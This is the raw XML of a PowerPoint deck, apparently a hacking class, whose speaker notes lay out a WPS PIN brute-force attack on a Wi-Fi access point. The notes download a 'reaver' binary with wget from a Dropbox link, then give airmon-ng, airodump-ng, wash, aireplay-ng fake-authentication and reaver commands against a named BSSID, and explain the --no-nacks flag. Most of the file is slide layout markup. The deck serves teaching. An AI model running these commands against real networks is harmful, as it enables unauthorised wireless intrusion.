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8" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId15"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId16"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="362" r:id="rId3"/>
    <p:sldId id="360" r:id="rId4"/>
    <p:sldId id="361" r:id="rId5"/>
    <p:sldId id="363" r:id="rId6"/>
    <p:sldId id="352" r:id="rId7"/>
    <p:sldId id="353" r:id="rId8"/>
    <p:sldId id="368" r:id="rId9"/>
    <p:sldId id="364" r:id="rId10"/>
    <p:sldId id="365" r:id="rId11"/>
    <p:sldId id="366" r:id="rId12"/>
    <p:sldId id="367" r:id="rId13"/>
    <p:sldId id="369" r:id="rId14"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Sniglet" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId17"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Dosis" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId18"/>
      <p:bold r:id="rId19"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
      <p:italic r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId21"/>
      <p:bold r:id="rId22"/>
      <p:italic r:id="rId23"/>
      <p:boldItalic r:id="rId24"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="3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27A8D3-8E02-4833-AC72-0F9BAFB9D0F3}">
  <a:tblStyle styleId="{B527A8D3-8E02-4833-AC72-0F9BAFB9D0F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797" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="145" d="100"/>
          <a:sy n="145" d="100"/>
        </p:scale>
        <p:origin x="114" y="426"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="-246"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="261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C6035F-FE84-4C26-97C1-339C346519BD}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2018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3F7B4E-FD80-43CB-963E-532EA0B6C493}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4740112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626091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4032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err="1" smtClean="0"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>wpscrack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>wpscrack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dropbox\Public\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>forTeaching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\hacking\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reaver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> https://www.dropbox.com/s/onjf1wbn9fnbwvz/reaver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="948353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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> +x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reaver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1654891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5853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err="1" smtClean="0"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng stop wlan0mon //optional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng start wlan0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng wlan0mon  //find channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>wash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> wlan0mon</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err="1" smtClean="0"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 48:5D:36:06:CF:C8 --channel 11  wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fakeauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 30 -a 48:5D:36:06:CF:C8 -h 9C:EF:D5:FE:2E:F3 wlan0mon  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reaver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 48:5D:36:06:CF:C8 --channel 11 --interface wlan0mon -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --no-associate --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>no-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Run the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>reaver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> command by adding '--no-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>' at the end.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Actually when you brute force pin and pin is wrong, then ideally AP should send NACK (not acknowledged) packet to the device telling him that pin was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>incorrect.But</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> ,some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied instead of responding with a NACK message as the specs dictate. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Thus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>reaver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> keeps on waiting for these NACK packet and ultimately timeout occurs (the max. time which AP should wait for NACK). Then it tries same pin again and process goes on and on...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>By adding --no-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nacks</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reaver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> won't wait for these packets and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>cappy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> on his work by attempting new pin.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298734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61"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305100" y="1161050"/>
            <a:ext cx="6153000" cy="1159800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782011" y="5350391"/>
            <a:ext cx="794875" cy="985737"/>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4" name="Google Shape;164;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4183587"/>
            <a:ext cx="782014" cy="890356"/>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5" name="Google Shape;165;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4083420" y="4552720"/>
            <a:ext cx="370865" cy="809588"/>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6" name="Google Shape;166;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136364" y="4258654"/>
            <a:ext cx="730671" cy="895811"/>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7" name="Google Shape;167;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459967" y="4416012"/>
            <a:ext cx="805934" cy="75083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8" name="Google Shape;168;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8422778" y="4477143"/>
            <a:ext cx="873792" cy="600260"/>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69" name="Google Shape;169;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609435" y="4255840"/>
            <a:ext cx="657208" cy="679227"/>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0" name="Google Shape;170;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4478200" y="5125134"/>
            <a:ext cx="919681" cy="950908"/>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1" name="Google Shape;171;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2703231" y="5166838"/>
            <a:ext cx="890356" cy="7068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2" name="Google Shape;172;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2174861" y="4316456"/>
            <a:ext cx="829755" cy="78016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3" name="Google Shape;173;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1405680" y="4316447"/>
            <a:ext cx="599146" cy="706812"/>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4" name="Google Shape;174;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2739934" y="5943858"/>
            <a:ext cx="816944" cy="313967"/>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5" name="Google Shape;175;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7204740" y="5639064"/>
            <a:ext cx="1040884" cy="73062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6" name="Google Shape;176;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7204749" y="4234732"/>
            <a:ext cx="684732" cy="721463"/>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7" name="Google Shape;177;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5320526" y="5859816"/>
            <a:ext cx="525046" cy="372666"/>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8" name="Google Shape;178;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8434691" y="5859361"/>
            <a:ext cx="508532" cy="324976"/>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79" name="Google Shape;179;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3867035" y="5559626"/>
            <a:ext cx="570935" cy="567282"/>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0" name="Google Shape;180;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033710" y="4183572"/>
            <a:ext cx="541560" cy="67927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1" name="Google Shape;181;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629104" y="5158595"/>
            <a:ext cx="734324" cy="723314"/>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2" name="Google Shape;182;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305379" y="5225175"/>
            <a:ext cx="275434" cy="244207"/>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3" name="Google Shape;183;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8575263" y="5213184"/>
            <a:ext cx="690236" cy="510383"/>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4" name="Google Shape;184;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
